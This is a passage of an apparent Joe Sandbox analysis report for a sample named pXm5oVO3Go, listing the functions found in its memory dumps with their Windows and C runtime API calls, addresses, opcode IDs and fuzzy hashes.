                                  • API String ID: 4063778783-2612920253
                                  • Opcode ID: 328c220b32d40f171b15634ce83f9b634308f59b7d92a067a936f59f01f4bf3f
                                  • Instruction ID: ce9e8872aa3521b847ada45dcded9d4a69b10e2cd2495da4b5261623828ab12f
                                  • Opcode Fuzzy Hash: 328c220b32d40f171b15634ce83f9b634308f59b7d92a067a936f59f01f4bf3f
                                  • Instruction Fuzzy Hash: 0CE065B091021E56DB14FBE8BE557FFB3A8AB44314F400A5EE81552281FB7496188596
                                  APIs
                                  • __time64.LIBCMT ref: 00416076
                                    • Part of subcall function 00639CAB: GetSystemTimeAsFileTime.KERNEL32(004039B9,?,?,?,004039B9,?), ref: 00639CB6
                                    • Part of subcall function 00639CAB: __aulldiv.LIBCMT ref: 00639CD6
                                  • _free.LIBCMT ref: 00416558
                                  • _free.LIBCMT ref: 00416576
                                  • _free.LIBCMT ref: 004165CB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: _free$Time$FileSystem__aulldiv__time64
                                  • String ID:
                                  • API String ID: 2144621163-0
                                  • Opcode ID: ae325ad0978f90a2bcb23a69e0fe8c2e240c595b26e3e1eb508136fca242f566
                                  • Instruction ID: e597b6e21c83b24130f071aa91b61d5d9bc74d6e09b869afe4f0e8ae7f2d0e3b
                                  • Opcode Fuzzy Hash: ae325ad0978f90a2bcb23a69e0fe8c2e240c595b26e3e1eb508136fca242f566
                                  • Instruction Fuzzy Hash: 1CF1FEB1D052688FEB64DF68C940BDEBBB2AF48304F0080EED50DA7241EB745A84CF56
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: _memcpy_s
                                  • String ID:
                                  • API String ID: 2001391462-0
                                  • Opcode ID: 4aae6be86b3d1d6b4d14aff822c58be8236295e128db5a4c594978f02a2d8c6c
                                  • Instruction ID: 8c24046f839265f7dd94c471ccf04658c85cbb5e949e23bb84d2cde45bcb72f7
                                  • Opcode Fuzzy Hash: 4aae6be86b3d1d6b4d14aff822c58be8236295e128db5a4c594978f02a2d8c6c
                                  • Instruction Fuzzy Hash: 36818D75A00200EFD725DF58C884E6AF7F5FF88304F15896EE8559B391D774AA09CB90
                                  APIs
                                  • CloseHandle.KERNEL32(0FC63B00), ref: 00414099
                                  • __beginthread.LIBCMT ref: 004140A7
                                    • Part of subcall function 0053B74E: ShowWindow.USER32(?,00000010,?,00414550,00000005,ED2F953D,00000001,?,00000000,006810BE,000000FF,?,004133F1), ref: 0053B75F
                                  • GetParent.USER32(?), ref: 004140BC
                                  • ShowWindow.USER32(?,00000000,00000000), ref: 004140D2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: ShowWindow$CloseHandleParent__beginthread
                                  • String ID:
                                  • API String ID: 1493545653-0
                                  • Opcode ID: ffa002d93298e9499bd8dd7db7d0b7f8f1a69d8d5c3601c1ed2bd556b26548dc
                                  • Instruction ID: 40fa224e23b8f830ad82b08462eb6a28997bcf049a9d30b45e0b5e7cf52f7138
                                  • Opcode Fuzzy Hash: ffa002d93298e9499bd8dd7db7d0b7f8f1a69d8d5c3601c1ed2bd556b26548dc
                                  • Instruction Fuzzy Hash: A5517B70601A419FD344CB6CCC55B5AB7A5FF9A324F28C299E429CB3A6CB35ED05CB90
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                  • String ID:
                                  • API String ID: 2782032738-0
                                  • Opcode ID: a584004fc8b3a9089610cee54cf01574a296b3d080a3ef681ce58d3a7734c3a5
                                  • Instruction ID: c7fab856d2a27a766db93898b076ec008c535135ce2a0e5626932eaa9228ed76
                                  • Opcode Fuzzy Hash: a584004fc8b3a9089610cee54cf01574a296b3d080a3ef681ce58d3a7734c3a5
                                  • Instruction Fuzzy Hash: 8041B231A006049BDF249FE9C845AAEBBB7AF81730F28852CE49597390D770DD55EBC2
                                  APIs
                                  • ____mb_cur_max_func.LIBCMT ref: 00402900
                                    • Part of subcall function 00639212: __getptd.LIBCMT ref: 00639212
                                  • __Wcrtomb.LIBCPMT ref: 00402920
                                    • Part of subcall function 0065E3E4: ____lc_handle_func.LIBCMT ref: 0065E3F2
                                    • Part of subcall function 0065E3E4: ____lc_codepage_func.LIBCMT ref: 0065E3FA
                                  • __Wcrtomb.LIBCPMT ref: 00402942
                                  • _memmove.LIBCMT ref: 00402961
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Wcrtomb$____lc_codepage_func____lc_handle_func____mb_cur_max_func__getptd_memmove
                                  • String ID:
                                  • API String ID: 3492520905-0
                                  • Opcode ID: 8207e427de21746d45508ff11f3c515f112166457444a55717eab402c0ad729e
                                  • Instruction ID: 9831e8d324916d0bc7efbe47cdbc09d3889d4b1a451e8b32cc14a188b638ffe8
                                  • Opcode Fuzzy Hash: 8207e427de21746d45508ff11f3c515f112166457444a55717eab402c0ad729e
                                  • Instruction Fuzzy Hash: 393130B5B0020A9FCB14DF58D9819AEB3F5FF98310F10446EE985A7381D7789D50CBA5
                                  APIs
                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0064713D
                                  • __isleadbyte_l.LIBCMT ref: 00647170
                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,0063B8F1,?,00000000,00000000,?,?,?,?,0063B8F1,00000000), ref: 006471A1
                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,0063B8F1,00000001,00000000,00000000,?,?,?,?,0063B8F1,00000000), ref: 0064720F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                  • String ID:
                                  • API String ID: 3058430110-0
                                  • Opcode ID: 688babb82090d7b222c19621c08e13c2a58b9a57ca6fac4f01b99b7c2f31f7d9
                                  • Instruction ID: a99febe395971e34e12f635b1b3c0d0681f2f1ecd1848f63a14cac2f5e62c5c7
                                  • Opcode Fuzzy Hash: 688babb82090d7b222c19621c08e13c2a58b9a57ca6fac4f01b99b7c2f31f7d9
                                  • Instruction Fuzzy Hash: 84318E31A08286EFEB20DF64CC85AAE7BBBFF01310F1845A9E4659B291D730DD41DB94
                                  APIs
                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 03654A5D
                                  • __isleadbyte_l.LIBCMT ref: 03654A90
                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,0364ADCF,?,00000000,00000000,?,?,?,?,0364ADCF,00000000), ref: 03654AC1
                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,0364ADCF,00000001,00000000,00000000,?,?,?,?,0364ADCF,00000000), ref: 03654B2F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                  • String ID:
                                  • API String ID: 3058430110-0
                                  • Opcode ID: 8c72fa43da4b4695d9512640b885080e028b736949950718b94da1c77f91feec
                                  • Instruction ID: 68be06bc7648be7dd8eb30b042813cd98d6aa060be05357a9aba72ad0c042f82
                                  • Opcode Fuzzy Hash: 8c72fa43da4b4695d9512640b885080e028b736949950718b94da1c77f91feec
                                  • Instruction Fuzzy Hash: CF31E230A00255EFDF62DF65C9859BE7BA5AF01210F0885F8F8648B299EBB0D980DB54
                                  APIs
                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10014A59
                                  • __isleadbyte_l.LIBCMT ref: 10014A8C
                                  • MultiByteToWideChar.KERNEL32(39858D00,00000009,?,C4830000,?,00000000,?,?,?,100013C8,?,grams), ref: 10014ABD
                                  • MultiByteToWideChar.KERNEL32(39858D00,00000009,?,00000001,?,00000000,?,?,?,100013C8,?,grams), ref: 10014B2B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                  • String ID:
                                  • API String ID: 3058430110-0
                                  • Opcode ID: af4ae635bc1a6c5b9520639113cb03c657ddf4de72e7d3a9bcded98ead903cf4
                                  • Instruction ID: 68850b2554d5d5f992d4f98ce77fb82b49c6c0d64f95470cd521bd8ccef0272d
                                  • Opcode Fuzzy Hash: af4ae635bc1a6c5b9520639113cb03c657ddf4de72e7d3a9bcded98ead903cf4
                                  • Instruction Fuzzy Hash: C631D231A40286EFDB10CF64C895AAD3BF5EF01291F5B85A9F4608F0A1DB70DD80DB56
                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 03641054
                                  • lstrlen.KERNEL32 ref: 036410AF
                                  • _memset.LIBCMT ref: 036410E4
                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,000000FF,?,00000104), ref: 03641103
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: ByteCharInitializeMultiWide_memsetlstrlen
                                  • String ID:
                                  • API String ID: 4073151907-0
                                  • Opcode ID: a5b21abc51d70361f0c4bdfd237f2ad48ce2c1a6c487fa7abf31cdbc4d6691fd
                                  • Instruction ID: 6f5a66ae1fb900e88fde78b0f053d829fd7854f9bad2fb84aa762073dbdf6768
                                  • Opcode Fuzzy Hash: a5b21abc51d70361f0c4bdfd237f2ad48ce2c1a6c487fa7abf31cdbc4d6691fd
                                  • Instruction Fuzzy Hash: A731E8B4A4122CAFDB10DBA4CC8CEDABBB9EF59701F104598F519DB250DB709A81CF60
                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 10001050
                                  • lstrlen.KERNEL32 ref: 100010AB
                                  • _memset.LIBCMT ref: 100010E0
                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,000000FF,?,00000104), ref: 100010FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: ByteCharInitializeMultiWide_memsetlstrlen
                                  • String ID:
                                  • API String ID: 4073151907-0
                                  • Opcode ID: a5b21abc51d70361f0c4bdfd237f2ad48ce2c1a6c487fa7abf31cdbc4d6691fd
                                  • Instruction ID: 643029faf5a280c88e49533a5ea94790e45b7ec269e2751bbc5c19a93816d1a2
                                  • Opcode Fuzzy Hash: a5b21abc51d70361f0c4bdfd237f2ad48ce2c1a6c487fa7abf31cdbc4d6691fd
                                  • Instruction Fuzzy Hash: 603108B4A40228AFEB10DBA4CC8CEDA77B9EF59740F104598F519DB251DB709B81CF60
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00537993
                                    • Part of subcall function 005373CC: _malloc.LIBCMT ref: 005373EA
                                  • __CxxThrowException@8.LIBCMT ref: 005379D8
                                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000800,0040E4B8,00000000,00000000,?,?,0070D050,00000004,0040E4B8,?), ref: 00537A02
                                  • LocalFree.KERNEL32(0040E4B8,00000004,0040E4B8,?), ref: 00537A30
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc
                                  • String ID:
                                  • API String ID: 1776251131-0
                                  • Opcode ID: 5e0989503894a89ce33ca2c69b4bc4e8cee45f45ddce4aba07ae5d5cd333a11d
                                  • Instruction ID: f4dad5bf4fd8331f79df218eef6df64bca82330d4d780d32d99e6a7cfba37b3f
                                  • Opcode Fuzzy Hash: 5e0989503894a89ce33ca2c69b4bc4e8cee45f45ddce4aba07ae5d5cd333a11d
                                  • Instruction Fuzzy Hash: 431186B1904309AFDB11DF54CC05FAE3BA6FF88710F208619F9559B191D7719951CB90
                                  APIs
                                  • GetTopWindow.USER32(?), ref: 0054015D
                                  • GetTopWindow.USER32(00000000), ref: 0054019C
                                  • GetWindow.USER32(00000000,00000002), ref: 005401BA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Window
                                  • String ID:
                                  • API String ID: 2353593579-0
                                  • Opcode ID: 11b3032fbc6051c53b66df1080ab32d85e189235976543269dadaf9163f93417
                                  • Instruction ID: 8fcedd5c2437ee45f2f4682e75fc443542b30d37ae301507b3d03c84d433c31c
                                  • Opcode Fuzzy Hash: 11b3032fbc6051c53b66df1080ab32d85e189235976543269dadaf9163f93417
                                  • Instruction Fuzzy Hash: A301E53200161ABBCF126F919C09EDF3F2ABF89354F196110FA15650A0DB36C961EBA1
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                  • String ID:
                                  • API String ID: 3016257755-0
                                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                  • Instruction ID: 100b59af85060d8f11adc9cab5dc5a16f52c5d4488a7ea7790dde69870441a60
                                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                  • Instruction Fuzzy Hash: 0411403A04014EBBCF129F84CC51CEE3F26BF19251F498925FE1859530D637C5B2AB89
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                  • String ID:
                                  • API String ID: 3016257755-0
                                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                  • Instruction ID: d628bd778cdf467a8e3ad5f5b80e9ec9ac3b556a525b6735c1659829dff4249a
                                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                  • Instruction Fuzzy Hash: FA1148B644018ABBCF169F84CC418EE3F62FB19394B558515FE2859131D336D9B2EB81
                                  APIs
                                  • __CxxThrowException@8.LIBCMT ref: 005381C2
                                  • __CxxThrowException@8.LIBCMT ref: 005381A6
                                    • Part of subcall function 00641C89: RaiseException.KERNEL32(00401FC3,?,ED2F953D,006FC518,00401FC3,?,0071C220,?,ED2F953D), ref: 00641CCB
                                  • __CxxThrowException@8.LIBCMT ref: 005381DE
                                  • __EH_prolog3.LIBCMT ref: 005381EB
                                    • Part of subcall function 0054D6E3: LocalAlloc.KERNEL32(00000040,?,?,005381FA,00000164,00000004,000000FF,0070D1E0,?,?,?,00537A2A,00000000,?,?,0040E4B8), ref: 0054D6ED
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Exception@8Throw$AllocExceptionH_prolog3LocalRaise
                                  • String ID:
                                  • API String ID: 793778368-0
                                  • Opcode ID: ca81457d4de920e0e9a4b435b2de6e2e86ac664cf2db3769abdb34d4a3b4ab93
                                  • Instruction ID: cd24cc8813b73678d992765c0f20a32a7336029e90e4c99d5b6fa40ed009152a
                                  • Opcode Fuzzy Hash: ca81457d4de920e0e9a4b435b2de6e2e86ac664cf2db3769abdb34d4a3b4ab93
                                  • Instruction Fuzzy Hash: 82F081F090030CFBDB54FBD58C4AE9E7AEEAB85700F610168B10497141EAF46F408265
                                  APIs
                                  • _malloc.LIBCMT ref: 0364BD26
                                    • Part of subcall function 0364B4CF: __FF_MSGBANNER.LIBCMT ref: 0364B4E8
                                    • Part of subcall function 0364B4CF: __NMSG_WRITE.LIBCMT ref: 0364B4EF
                                    • Part of subcall function 0364B4CF: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0364B514
                                  • std::exception::exception.LIBCMT ref: 0364BD5B
                                  • std::exception::exception.LIBCMT ref: 0364BD75
                                  • __CxxThrowException@8.LIBCMT ref: 0364BD86
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                  • String ID:
                                  • API String ID: 615853336-0
                                  • Opcode ID: 7c2a2ce753ea75b9086bf07cd7115e04596d0922f47d555c69502c2f3612d0f7
                                  • Instruction ID: 2c35f42e12a34a8fd1b4abb2e0a1e017750c2777b7215d78d04966e0cbc26235
                                  • Opcode Fuzzy Hash: 7c2a2ce753ea75b9086bf07cd7115e04596d0922f47d555c69502c2f3612d0f7
                                  • Instruction Fuzzy Hash: 5AF02279C0034ABADB04FB94CC80AEE7AB9EF00610F64019DF855EF290CB74CB668754
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 0040133F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_
                                  • String ID: VUUU$string too long
                                  • API String ID: 909987262-2095466819
                                  • Opcode ID: 6e096561287a09d7b5ede593103a1efb539944f00072bc765df1a0d9779e2e2b
                                  • Instruction ID: d99d58f76e16cf0adc9b54881a7f57cc5e584403886d3e38afc913bc0f384d50
                                  • Opcode Fuzzy Hash: 6e096561287a09d7b5ede593103a1efb539944f00072bc765df1a0d9779e2e2b
                                  • Instruction Fuzzy Hash: 11D1A4313046908BDB29CF2CC55066AB7F2FF46300B544A6EE492AF7E2C779E941C799
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00401BB5
                                  • _memmove.LIBCMT ref: 00401C06
                                    • Part of subcall function 00401E20: std::_Xinvalid_argument.LIBCPMT ref: 00401E3A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$_memmove
                                  • String ID: string too long
                                  • API String ID: 2168136238-2556327735
                                  • Opcode ID: a8942cac172f09dfd1cdfc1b2e0bf65ebecc830be2f48b96fe9bc1d522a489f0
                                  • Instruction ID: 75f1ebdf17e935f49ec4d93712a82a5310d4e7158359f25100c90ea7e5a285df
